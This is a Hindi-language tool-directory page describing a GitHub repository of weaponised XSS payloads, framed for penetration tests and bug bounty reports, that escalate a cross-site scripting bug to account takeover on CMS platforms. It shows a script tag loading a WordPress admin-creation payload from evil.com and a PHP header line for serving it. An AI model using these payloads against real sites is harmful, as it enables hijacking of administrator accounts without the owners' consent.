Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
weaponised-XSS-payloads — XSS payloads designed to turn alert(1) into P1 | Kitploit
उपकरण/GitHubGitHub/hakluke/weaponised-xss-payloads
Payload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubhakluke/weaponised-xss-payloads

weaponised-XSS-payloads

XSS payloads designed to turn alert(1) into P1

रिपॉजिटरी देखें
1.4k2222 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

हथियारबंद XSS पेलोड्स

वे XSS पेलोड जो alert(1) को P1 में बदलने के लिए डिज़ाइन किए गए हैं।

ब्लॉग पोस्ट

यह रेपो "How to Upgrade Your XSS Bugs from Medium to Critical" शीर्षक वाली एक ब्लॉगपोस्ट के साथ जारी किया गया था https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

यह क्या है?

इस रेपो में आपको कई JavaScript फ़ाइलें मिलेंगी जिन्हें XSS पेलोड में लोड किया जा सकता है, ताकि पीड़ित के ब्राउज़र के संदर्भ में लोकप्रिय CMS प्लेटफ़ॉर्म पर संवेदनशील कार्य किए जा सकें। यह एक साधारण XSS बग को किसी अधिक गंभीर चीज़, जैसे अकाउंट टेकओवर, से जोड़ने में मदद कर सकता है।

यह वास्तविक सुरक्षा प्रभाव प्रदर्शित करके पेंटेस्ट या बग बाउंटी रिपोर्ट की गंभीरता को बढ़ाने के लिए एकदम सही है।

पेलोड्स को धीरे-धीरे जोड़ा जा रहा है, जैसे-जैसे मेरे पास समय होता है। आने वाले और भी कई पेलोड हैं; यदि आप मदद कर सकते हैं, तो pull requests का स्वागत है! यदि आप कुछ बनाने के लिए प्रेरणा ढूंढ रहे हैं, तो इस रेपो पर "issues" टैब देखें।

कैसे करें

इन पेलोड्स का उपयोग करने का सबसे आसान तरीका है उन्हें कहीं होस्ट करना और अपने XSS पेलोड के लिए script टैग के src एट्रिब्यूट में लोड करना, जैसे:

root@kitploit:~
<script src="http://evil.com/wordpress_create_admin_user.js"></script>

वैकल्पिक रूप से, पेलोड के संदर्भ और लंबाई के आधार पर, इसे कभी-कभी मिनिफ़ाइड, एन्कोडेड किया जा सकता है और फिर सीधे अनुरोध में शामिल किया जा सकता है।

JavaScript फ़ाइल होस्ट करने के लिए, आपको Content-Type को application/javascript सेट करने की आवश्यकता हो सकती है। इसे PHP के साथ पूरा करने के लिए, आप किसी भी पेलोड के शीर्ष पर यह पंक्ति जोड़ सकते हैं, इसे .php फ़ाइल के रूप में सहेज सकते हैं और इसे अपने PHP-सक्षम वेबसर्वर पर होस्ट कर सकते हैं:

root@kitploit:~
<?php header("Content-Type: application/javascript"); ?>

श्रेय

यह लेख Shift8 का है, जिसने मुझे यह रेपो बनाने के लिए प्रेरित किया। लेख में JS में कुछ छोटी टाइपो हैं, लेकिन अवधारणाएँ बिल्कुल सटीक हैं।

टूल डाउनलोड करें